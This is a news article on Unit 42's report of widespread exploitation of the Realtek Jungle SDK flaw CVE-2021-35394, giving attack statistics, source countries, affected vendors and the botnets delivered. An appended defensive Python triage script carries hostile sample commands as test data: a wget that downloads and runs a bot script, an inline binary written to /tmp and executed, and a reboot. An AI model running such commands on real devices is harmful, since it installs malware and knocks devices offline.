According to a new report from Palo Alto Networks’ Unit 42 researchers, between August and October 2022, cybercriminals increased their efforts to exploit a Realtek Jungle SDK vulnerability.
Usually, a single vulnerability accounts for about 10% of all attacks researchers record. In this case, however, over 40% of all attacks involved exploitation of the Realtek remote code execution (RCE) vulnerability.
The Realtek Jungle SDK RCE is tracked as CVE-2021-35394 and carries a CVSS score of 9.8. As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97% of them occurred at the beginning of August 2022.
This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.
Attackers find it attractive because a flaw in a shared SDK propagates through the supply chain, making it difficult for users to identify which products are affected and being exploited. It is an arbitrary command injection and buffer overflow bug that could be leveraged to execute arbitrary code with the highest level of privileges, ultimately taking full control of the compromised device.
According to Unit 42’s blog post, most of the attacks observed were attempts to deliver malware and compromise vulnerable IoT devices, indicating that threat actors aim to launch large-scale attacks against internet-connected devices worldwide.
Around 50% of the attacks (48.3% to be precise) were launched from the USA, followed by Vietnam (17.8%) and Russia (14.6%). Other prominent regions include the Netherlands (7.4%), Germany (2.3%), France (6.4%), and Luxembourg (1.6%).
Moreover, 95% of the attacks targeting the vulnerability and originating from Russia were launched against Australian organizations.
Unit 42 identified three kinds of payloads distributed through in-the-wild exploitation of this bug. The first is a script that executes a shell command on the targeted device and downloads additional malware.
The second is an injected command that writes a binary payload to a file and executes that file. The third is an injected command that directly reboots the targeted device, causing a denial of service (DoS).
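As an added example (not code from the Unit 42 report or this article), the following Python triage function maps a captured injected command string to the three payload classes described above, so an analyst can bucket exploit attempts by intent; the sample commands and the matching patterns are constructed assumptions, not indicators from the report.

```python
import re

# Constructed sample injected commands (not taken from the report): one per
# payload class the article describes, plus a benign command for contrast.
SAMPLE_COMMANDS = [
    "cd /tmp; wget http://198.51.100.7/bot.sh; chmod 777 bot.sh; sh bot.sh",
    "echo -ne '\\x7f\\x45\\x4c\\x46' > /tmp/.x; chmod +x /tmp/.x; /tmp/.x",
    "/sbin/reboot",
    "ls -la /var/log",
]

# Assumed heuristics for each payload class; tune them to your own telemetry.
DOWNLOAD = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
WRITE = re.compile(r"\b(echo|printf)\b[^;|&]*>{1,2}\s*\S+")
EXEC = re.compile(r"(\bchmod\s+\+?[0-7x]+\b|\bsh\s+\S+|(^|[;&|]\s*)\.?/\S+)")
REBOOT = re.compile(r"\b(reboot|shutdown)\b")


def classify_payload(cmd: str) -> str:
    """Return one of the three payload classes from the article, or 'unknown'.

    Order matters: a bare reboot is checked first, then a downloader (class 1),
    then an inline write of a binary that is subsequently executed (class 2).
    """
    if REBOOT.search(cmd):
        return "reboot-dos"
    if DOWNLOAD.search(cmd):
        return "download-and-execute"
    if WRITE.search(cmd) and EXEC.search(cmd):
        return "write-and-execute"
    return "unknown"


def triage(commands):
    """Pair each captured command with its payload class for reporting."""
    return [(cmd, classify_payload(cmd)) for cmd in commands]


if __name__ == "__main__":
    for cmd, label in triage(SAMPLE_COMMANDS):
        print(f"{label:22s} {cmd}")
```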
Additionally, attackers can exploit this bug to deliver known botnets such as Mozi, Mirai, Gafgyt, and the new Golang-based DDoS botnet called RedGoBot.
Vulnerable IoT devices include IP cameras, routers, residential gateways, and Wi-Fi repeaters from at least 66 vendors, including Belkin, D-Link, ASUS, Huawei, LG, ZTE, Logitech, Zyxel, and NETGEAR.